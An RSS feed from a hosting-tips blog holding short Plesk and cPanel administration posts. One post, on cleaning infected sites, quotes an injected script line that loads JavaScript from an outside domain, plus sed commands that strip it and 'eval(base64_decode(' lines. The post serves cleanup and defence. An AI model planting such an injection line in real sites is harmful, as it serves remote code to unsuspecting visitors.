<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Tech Stuff &#187; Plesk</title>
	<atom:link href="http://tech-stuff.org/category/uncategorized/hosting/plesk-hosting/feed/" rel="self" type="application/rss+xml" />
	<link>http://tech-stuff.org</link>
	<description>Hosting Tips &#38; Tricks</description>
	<lastBuildDate>Fri, 20 May 2011 14:08:32 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Where are the plesk key files?</title>
		<link>http://tech-stuff.org/where-are-the-plesk-key-files/</link>
		<comments>http://tech-stuff.org/where-are-the-plesk-key-files/#comments</comments>
		<pubDate>Fri, 22 Apr 2011 13:18:03 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[hosting]]></category>
		<category><![CDATA[Plesk]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[key]]></category>
		<category><![CDATA[plesk8]]></category>
		<category><![CDATA[Plesk9]]></category>

		<guid isPermaLink="false">http://tech-stuff.org/?p=196</guid>
		<description><![CDATA[Where can we find the plesk key file (file containing the key)? Get the Key number/files from shell: 1. Parallels Panel 7.x &#8211; 8.x: # grep &#8216;Key number&#8217; /etc/psa/psa.key 2. Parallels Panel 9.x: grep &#8216;key-number&#8217; /etc/sw/keys/keys/key* Plesk for Windows: 1. In Plesk control panel go to Server, License Management and see the license number there. [...]]]></description>
			<content:encoded><![CDATA[<p>Where can we find the plesk key file (file containing the key)?</p>
<p>Get the Key number/files from shell:</p>
<p>1. Parallels Panel 7.x &#8211; 8.x:<br />
# grep &#8216;Key number&#8217; /etc/psa/psa.key</p>
<p>2. Parallels Panel 9.x:<br />
grep &#8216;key-number&#8217; /etc/sw/keys/keys/key*</p>
<p>Plesk for Windows:</p>
<p>1. In Plesk control panel go to Server, License Management and see the license number there.<br />
2. Use the command in the command prompt:<br />
&#8220;%plesk_bin%\keymng.exe&#8221; &#8211;get-key-number</p>
<p>key file on plesk windows is in:</p>
<p>C:\Program Files (x86)\Parallels\Plesk\admin\repository\keys\keyxxxxxx</p>
<p>when you change it , you have to delete C:\Program Files (x86)\Parallels\Plesk\admin\repository\registry.xml and it will be recreated after first accessing plesk interface.</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://tech-stuff.org/where-are-the-plesk-key-files/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to easy clean infected sites</title>
		<link>http://tech-stuff.org/how-to-easy-clean-infected-sites/</link>
		<comments>http://tech-stuff.org/how-to-easy-clean-infected-sites/#comments</comments>
		<pubDate>Wed, 13 Apr 2011 13:25:48 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Cpanel]]></category>
		<category><![CDATA[hosting]]></category>
		<category><![CDATA[Plesk]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[code injection]]></category>
		<category><![CDATA[fix code]]></category>

		<guid isPermaLink="false">http://tech-stuff.org/?p=192</guid>
		<description><![CDATA[When you experience code injection in your site and there is only appending of code to the end of your site files you can clean it with : cd to your site&#8217;s httpdocs and run: find .  -type f -exec sed -i &#8216;/oployau.fancountblogger.com/d&#8217; {} \; for lines like : js/ac_runactivecontent.js:document.write(&#8216;&#60;s&#8217;+'cript type=&#8221;text/javascript&#8221; src=&#8221;http://oployau.fancountblogger.com:8080/Link.js&#8221;&#62;&#60;/scr&#8217;+'ipt&#62;&#8217;); or just find [...]]]></description>
			<content:encoded><![CDATA[<p>When you experience code injection in your site and there is only appending of code to the end of your site files you can clean it with :</p>
<p>cd to your site&#8217;s httpdocs and run:</p>
<p>find .  -type f -exec sed -i &#8216;/oployau.fancountblogger.com/d&#8217; {} \;</p>
<p>for lines like :</p>
<p>js/ac_runactivecontent.js:document.write(&#8216;&lt;s&#8217;+'cript type=&#8221;text/javascript&#8221; src=&#8221;http://oployau.fancountblogger.com:8080/Link.js&#8221;&gt;&lt;/scr&#8217;+'ipt&gt;&#8217;);</p>
<p>or just</p>
<p>find . -name &#8220;*.php&#8221; -type f -exec sed -i &#8216;/eval(base64_decode(/d&#8217; {} \;</p>
<p>if you want to check/repair only php files with base64 encoded injection.</p>
<p>Of course you need shell access for this or you can just request you hosting guys to do it for you.</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://tech-stuff.org/how-to-easy-clean-infected-sites/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Automatically suspending domains after update to Plesk9</title>
		<link>http://tech-stuff.org/automatically-suspending-domains-after-update-to-plesk9/</link>
		<comments>http://tech-stuff.org/automatically-suspending-domains-after-update-to-plesk9/#comments</comments>
		<pubDate>Fri, 08 Apr 2011 16:52:22 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[hosting]]></category>
		<category><![CDATA[Plesk]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Plesk9]]></category>

		<guid isPermaLink="false">http://tech-stuff.org/?p=190</guid>
		<description><![CDATA[it turns out Plesk 9 has something called the &#8220;Overuse Policy&#8221; which is configured in &#8220;Resource Usage&#8221; for each client. Careful with this as you might upgrade from Plesk 8.x and it defaults to &#8220;Overuse is not allowed&#8221;, which causes the auto-suspend to be activated if any domains exceed their limits. To solve this you [...]]]></description>
			<content:encoded><![CDATA[<p>it turns out Plesk 9 has something called the &#8220;Overuse Policy&#8221; which is configured in &#8220;Resource Usage&#8221; for each client. Careful with this as you might upgrade from Plesk 8.x and it defaults to &#8220;Overuse is not allowed&#8221;, which causes the auto-suspend to be activated if any domains exceed their limits.</p>
<p>To solve this you can set this in psa database:</p>
<p>update cl_param set val = &#8216;false&#8217; where param = &#8216;OveruseBlock&#8217;;<br />
update dom_param set val = &#8216;false&#8217; where param = &#8216;OveruseBlock&#8217;;</p>
<p>so no client or domain will be suspended . The drawback is that clients will be able to overuse any limits like no of domains , databases ,email accounts&#8230;.</p>
]]></content:encoded>
			<wfw:commentRss>http://tech-stuff.org/automatically-suspending-domains-after-update-to-plesk9/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Recalculate stats and free space for only one domain in Plesk</title>
		<link>http://tech-stuff.org/recalculate-stats-and-free-space-for-only-one-domain-in-plesk/</link>
		<comments>http://tech-stuff.org/recalculate-stats-and-free-space-for-only-one-domain-in-plesk/#comments</comments>
		<pubDate>Tue, 11 Jan 2011 10:02:45 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[hosting]]></category>
		<category><![CDATA[Plesk]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[statistics]]></category>

		<guid isPermaLink="false">http://tech-stuff.org/?p=171</guid>
		<description><![CDATA[It’s useful if a client has gone over their allocated disk space. Occasionally even if they delete everything Plesk still thinks they are over until the nightly cron jobs are re-run. This command just forces the job to re-run on  a single domain: /usr/local/psa/admin/sbin/statistics –calculate-one –domain-name=Domain_name.com]]></description>
			<content:encoded><![CDATA[<p>It’s useful if a client has gone over their allocated disk space. Occasionally even if they delete everything Plesk still thinks they are over until the nightly cron jobs are re-run.</p>
<p>This command just forces the job to re-run on  a single domain:</p>
<p>/usr/local/psa/admin/sbin/statistics –calculate-one –domain-name=Domain_name.com</p>
]]></content:encoded>
			<wfw:commentRss>http://tech-stuff.org/recalculate-stats-and-free-space-for-only-one-domain-in-plesk/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Plesk windows cannot add domain or update dns zone after last windows update</title>
		<link>http://tech-stuff.org/plesk-windows-cannot-add-domain-or-update-dns-zone-after-last-windows-update/</link>
		<comments>http://tech-stuff.org/plesk-windows-cannot-add-domain-or-update-dns-zone-after-last-windows-update/#comments</comments>
		<pubDate>Thu, 23 Sep 2010 18:46:54 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[hosting]]></category>
		<category><![CDATA[Plesk]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[dns]]></category>
		<category><![CDATA[dnsmng]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://tech-stuff.org/?p=165</guid>
		<description><![CDATA[Symptoms MSDNS is used as DNS server. Every time when you try to update domain hosting or DNS settings of the domain, Parallels Plesk Panel hangs. Sometimes it can fails with the following error: Failed domain creation: Unable to update domain data: Unable to create dnsmng object: dnsmng failed: Empty error message from utility The [...]]]></description>
			<content:encoded><![CDATA[<h2>Symptoms</h2>
<p>MSDNS is used as DNS server. Every time when you try to update domain hosting or DNS settings of the domain, Parallels Plesk Panel hangs. Sometimes it can fails with the following error:<br />
Failed domain creation: Unable to update domain data: Unable to create dnsmng object: dnsmng failed: Empty error message from utility</p>
<p>The following message can be found in event viewer:<br />
Faulting application DNSMng.exe, version 9.501.0.0, time stamp 0x4bc1f9fd, faulting module MsProv.dll, version 9.501.0.0, time stamp 0x4bc205bc, exception code 0xc0000005, fault offset 0x000600bb, process id 0x56c, application start time 0x01cae1ae46c559db</p>
<p>Utility &#8220;%plesk_bin%\dnsmng.exe&#8221; cannot be run from command line. It fails with the error:<br />
DNSMng.exe &#8211; Application Error : The instruction at &#8220;0x00ba74ac&#8221; referenced memory at &#8220;0x00bd2108&#8243;. The memory could not be &#8220;read&#8221;</p>
<div id="article-content">
<div>
<h2>Resolution</h2>
<p>This problem was discovered in Parallels Plesk Panel . Issue is caused by installed MS update <em>KB976576</em>. It updates libraries which are used by MSDNS.</p>
<p>Hotfix can be applied on Parallels Plesk Panel versions 8.6, 9.0-9.3 and 9.5</p>
<p>Before applying the fix you need to install the latest Microsoft Visual C++ 2005 Redistributable Package ATL Security Update vcredist_x86.exe from<br />
<a href="http://www.microsoft.com/downloads/details.aspx?familyid=766a6af7-ec73-40ff-b072-9112bab119c2&amp;displaylang=en">http://www.microsoft.com/downloads/details.aspx?familyid=766a6af7-ec73-40ff-b072-9112bab119c2&amp;displaylang=en</a></p>
<p>and backup the original file.</p>
<p><strong>Fix for Parallels Plesk Panel version8.6</strong>:<br />
Replace the file &#8220;%plesk_bin%\MsProv.dll&#8221; with the file MsPRov.dll from the <a href="http://kb.parallels.com/Attachments/13357/Attachments/MsProv86.zip">attachment</a>.</p>
<p><strong>Fix for Parallels Plesk Panel version 9.0-9.3:</strong><br />
Replace the file &#8220;%plesk_bin%\MsProv.dll&#8221; with the file MsPRov.dll from the <a href="http://kb.parallels.com/Attachments/13357/Attachments/MsProv.dll.900-930.zip">attachment</a>.</p>
<p><strong>Fix for Parallels Plesk Panel version 9.5</strong>:<br />
Replace the file &#8220;%plesk_bin%\MsProv.dll&#8221; with the file MsPRov.dll from the <a href="http://kb.parallels.com/Attachments/13357/Attachments/MsProv.950.zip">attachment</a>.</p>
<p>Once it is done, check if you can perform operations with domains and manage DNS records.</p></div>
<div>
<h2>Additional information</h2>
<p>%plesk_bin% is environment variable which points to Paralles Plesk binaries folder. Usually it is <em>C:\Program files\Parallels\Plesk\admin\bin</em></div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://tech-stuff.org/plesk-windows-cannot-add-domain-or-update-dns-zone-after-last-windows-update/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to disable php scripts execution in 777 folders</title>
		<link>http://tech-stuff.org/how-to-disable-php-scripts-execution-in-777-folders/</link>
		<comments>http://tech-stuff.org/how-to-disable-php-scripts-execution-in-777-folders/#comments</comments>
		<pubDate>Mon, 30 Aug 2010 07:21:30 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Cpanel]]></category>
		<category><![CDATA[hosting]]></category>
		<category><![CDATA[Plesk]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[htaccess]]></category>

		<guid isPermaLink="false">http://tech-stuff.org/?p=163</guid>
		<description><![CDATA[Many times malware php scripts are uploaded to sites when 777 (or just enough)  permision folders are present. Sometimes you just can&#8217;t set permissions to a secure level (because of crap applications) so you have to secure these folders another way. One solution is to use .htaccess files for example to stop direct php access/execution [...]]]></description>
			<content:encoded><![CDATA[<p>Many times malware php scripts are uploaded to sites when 777 (or just enough)  permision folders are present. Sometimes you just can&#8217;t set permissions to a secure level (because of crap applications) so you have to secure these folders another way.</p>
<p>One solution is to use .htaccess files for example to stop direct php access/execution in that folder/subfolders :</p>
<p>#touch .htaccess</p>
<p>content of .htaccess:</p>
<div id="_mcePaste">&lt;Files *.php&gt;</div>
<div id="_mcePaste">Order Deny,Allow</div>
<div id="_mcePaste">Deny from all</div>
<div id="_mcePaste">&lt;/Files&gt;</div>
]]></content:encoded>
			<wfw:commentRss>http://tech-stuff.org/how-to-disable-php-scripts-execution-in-777-folders/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Courier-imap not working after plesk upgrade</title>
		<link>http://tech-stuff.org/plesk-courier-imap-after-plesk-upgrade-not-working/</link>
		<comments>http://tech-stuff.org/plesk-courier-imap-after-plesk-upgrade-not-working/#comments</comments>
		<pubDate>Mon, 16 Aug 2010 15:49:07 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[hosting]]></category>
		<category><![CDATA[Plesk]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[imap]]></category>

		<guid isPermaLink="false">http://tech-stuff.org/?p=155</guid>
		<description><![CDATA[After a plesk upgrade without error imap service did not start and found following in maillog: &#8220;IMAP service was down there, it could not start with error Aug 17 08:00:05 websvr imapd: Invalid -maxperip option. Aug 17 08:00:05 websvr imapd-ssl: Invalid -maxperip option.&#8221; The reason of the error was that MAXPERIP option was absent in [...]]]></description>
			<content:encoded><![CDATA[<p>After a plesk upgrade without error imap service did not start and found following in maillog:</p>
<p>&#8220;IMAP service was down there, it could not start with error</p>
<p>Aug 17 08:00:05 websvr imapd: Invalid -maxperip option.<br />
Aug 17 08:00:05 websvr imapd-ssl: Invalid -maxperip option.&#8221;</p>
<p>The reason of the error was that MAXPERIP option was absent in /etc/courier-imap/imapd configuration file. I have added the missed line and restarted service. it  works OK now.</p>
]]></content:encoded>
			<wfw:commentRss>http://tech-stuff.org/plesk-courier-imap-after-plesk-upgrade-not-working/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Plesk windows file manager need to upload larger files</title>
		<link>http://tech-stuff.org/plesk-windows-file-manager-need-to-upload-larger-files/</link>
		<comments>http://tech-stuff.org/plesk-windows-file-manager-need-to-upload-larger-files/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 19:40:54 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[hosting]]></category>
		<category><![CDATA[Plesk]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[file manager]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://tech-stuff.org/?p=145</guid>
		<description><![CDATA[By default a client can&#8217;t upload files in plesk file manager larger then ~30MB . Unfortunately we have to let them upload bigger files because they like to use the  archive &#8220;uncompress&#8221; feature from file manager. The error received in plesk is: HTTP Error 404.13 &#8211; Not Found The request filtering module is configured to [...]]]></description>
			<content:encoded><![CDATA[<p>By default a client can&#8217;t upload files in plesk file manager larger then ~30MB . Unfortunately we have to let them upload bigger files because they like to use the  archive &#8220;uncompress&#8221; feature from file manager.</p>
<p>The error received in plesk is:</p>
<p><em><span style="color: #000000;">HTTP Error 404.13 &#8211; Not Found</span></em></p>
<p><em><span style="color: #000000;">The request filtering module is configured to deny a request that exceeds  the request content length.</span></em></p>
<p>All you have to do to solve this :</p>
<p><strong>%windir%\system32\inetsrv\appcmd set config &#8220;PleskControlPanel/&#8221; -section:requestFiltering -requestLimits.maxAllowedContentLength:104857600</strong></p>
<p>which will set a 100MB limit for file uploads in plesk file manager.</p>
]]></content:encoded>
			<wfw:commentRss>http://tech-stuff.org/plesk-windows-file-manager-need-to-upload-larger-files/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to renew plesk services ssl certificates (self signed)</title>
		<link>http://tech-stuff.org/how-to-renew-plesk-services-ssl-certificates-self-signed/</link>
		<comments>http://tech-stuff.org/how-to-renew-plesk-services-ssl-certificates-self-signed/#comments</comments>
		<pubDate>Fri, 16 Oct 2009 14:00:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[hosting]]></category>
		<category><![CDATA[Plesk]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[certificate]]></category>
		<category><![CDATA[ssl]]></category>

		<guid isPermaLink="false">http://tech-stuff.org/?p=136</guid>
		<description><![CDATA[For Parallels Plesk Panel version 7.x, 8.x: Server -&#62; Certificates -&#62; Add New Certificate For Parallels Plesk Panel version 9.x: Settings -&#62; SSL Certificates -&#62; Add SSL Certificate Fill in required preferences and click button {Self-Signed} New self-signed SSL certificate will be created in server certificate repository. To assign this SSL certificate for securing your [...]]]></description>
			<content:encoded><![CDATA[<p>For Parallels Plesk Panel version 7.x, 8.x:</p>
<p><span style="font-family: courier new,courier; font-size: 12px;"> Server -&gt; Certificates -&gt; Add New Certificate </span></p>
<p>For Parallels Plesk Panel version 9.x:</p>
<p><span style="font-family: courier new,courier; font-size: 12px;"> Settings -&gt; SSL Certificates -&gt; Add SSL Certificate </span></p>
<p>Fill in required preferences and click button {Self-Signed}</p>
<p>New self-signed SSL certificate will be created in server certificate repository.</p>
<p>To assign this SSL certificate for securing your Parallels Plesk Panel mark enabled new SSL certificate in the list and push <span style="text-decoration: underline;">Secure control panel</span> if you have Plesk 8.2 or later, or <span style="text-decoration: underline;">Install</span> if you have older Plesk version.<br />
Also, see Plesk documentation how to setup self-signed certificates.</p>
<p>After you created or uploaded new certificate into Plesk and wish to use it for domains you should set it for every IP you need, so domains use it when you access them via HTTPS.<br />
It can be done on page Server -&gt; IP Addresses -&gt; &#8220;choose IP&#8221; by selecting needed Certificate in &#8220;SSL Certificate&#8221; drop down menu.</p>
<p>or</p>
<p>I use 1 SSL cert for plesk control-panel, pop3s, imaps and smtps.</p>
<p>After generating the new certificate in the administrator repository. make it your default certificate and mark it again and press setup to install it on your plesk admin server on port 8443. then put the certificate at your main ip-adresse in your ip-pool(maybee this step is not necessary).</p>
<p>copy /usr/local/psa/admin/conf/httpsd.pem<br />
to<br />
/usr/share/courier-imap/pop3d.pem, /usr/share/courier-imap/imapd.pem and /var/qmail/control/servercert.pem</p>
<p>please have a look that the owner(very important) and the chmod rights are the same of pop3d.pem, imapd.pem and servercert.pem. like before otherwhise qmail will for example not work/start, because it can&#8217;t read the file.</p>
<p>restart courier(imap,pop3) and qmail(smtp) in the plesk server service control panel.</p>
<p>after this plesk control-panel 8443, pop3s, imaps and smtps should work without warning messages and with only 1 ssl cert, if you use for all services the same main hostname.domain.com address like me.</p>
<p>(maybee you should also have a look, that the same hostname is configured in the qmail config file)</p>
<p>finally to test certificates :</p>
<p>openssl s_client -connect [host]:993</p>
<p>openssl s_client -connect [host]:995</p>
<p>openssl s_client -connect [host]:465</p>
<p>openssl s_client -connect [host]:8443</p>
<p>where for e.g. host=localhost</p>
]]></content:encoded>
			<wfw:commentRss>http://tech-stuff.org/how-to-renew-plesk-services-ssl-certificates-self-signed/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Apache did not start</title>
		<link>http://tech-stuff.org/apache-did-not-start/</link>
		<comments>http://tech-stuff.org/apache-did-not-start/#comments</comments>
		<pubDate>Thu, 08 Oct 2009 12:49:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Cpanel]]></category>
		<category><![CDATA[hosting]]></category>
		<category><![CDATA[Plesk]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[apache]]></category>

		<guid isPermaLink="false">http://tech-stuff.org/?p=134</guid>
		<description><![CDATA[Error log contains: [emerg] (28)No space left on device: Couldn&#8217;t create accept lock or [crit] (28)No space left on device: mod_rewrite: could not create rewrite_log_lock Configuration Failed Checking your disk shows that you have plenty of space. The problem is that apache didn&#8217;t shut down properly, and it&#8217;s left myriads of semaphore-arrays left, owned by [...]]]></description>
			<content:encoded><![CDATA[<p>Error log contains:</p>
<p>[emerg] (28)No space left on device: Couldn&#8217;t create accept                        lock<br />
or<br />
[crit] (28)No space left on device: mod_rewrite: could not                        create rewrite_log_lock Configuration Failed<br />
Checking your disk shows that you have plenty of space.                        The problem is that apache didn&#8217;t shut down properly, and                        it&#8217;s left myriads of semaphore-arrays left, owned by my                        apache-user. Run:-</p>
<p>For CPanel :</p>
<p>ipcs -s | grep nobody<br />
Removing these semaphores immediately should solve the problem                        and allow apache to start.<br />
ipcs -s | grep nobody | perl                        -e &#8216;while (&lt;STDIN&gt;) { @a=split(/\s+/); print `ipcrm                        sem $a[1]`}&#8217;</p>
<p>For Plesk :</p>
<p>ipcs -s | grep apache<br />
Removing these semaphores immediately should solve the problem                        and allow apache to start.<br />
ipcs -s | grep apache | perl -e &#8216;while (&lt;STDIN&gt;) { @a=split(/\s+/); print `ipcrm sem $a[1]`}&#8217;</p>
]]></content:encoded>
			<wfw:commentRss>http://tech-stuff.org/apache-did-not-start/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 1/61 queries in 0.051 seconds using disk: basic
Object Caching 573/693 objects using disk: basic

Served from: tech-stuff.org @ 2012-02-05 22:36:04 -->
